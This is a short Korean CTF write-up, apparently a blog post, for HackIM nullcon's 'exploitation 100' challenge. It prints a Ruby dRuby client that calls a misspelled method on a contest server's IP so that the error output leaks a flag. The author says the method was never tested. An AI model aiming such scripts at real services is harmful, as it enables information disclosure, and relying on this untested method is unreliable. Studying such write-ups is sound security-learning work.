0x10 정보보안/0x15 System
HackIM nullcon exploitation 100 write-up [exploit]
sweetchip
2014. 1. 27. 15:34
반응형
binary :
require 'drb/drb'
# The URI to connect to
#SERVER_URI="druby://127.0.0.1:8988"
SERVER_URI="druby://23.23.190.205:8988"
# Start a local DRbServer to handle callbacks.
#
# Not necessary for this small example, but will be required
# as soon as we pass a non-marshallable object as an argument
# to a dRuby call.
DRb.start_service
timeserver = DRbObject.new_with_uri(SERVER_URI)
puts timeserver.get_current_time1
서버가 닫혀있어서 시도해보진 못햇지만 잘못된 메소드 이름을 사용하면 오류가 발생할것이고
그 안에 변수로 설정된 flag도 함께 출력된다
위 exploit이 다르면 덧글로 달아주세요
관리자에게 서버 관련 문의를 해도 정상적이라는 답변만 돌아와서 시도하지는 못했습니다.
반응형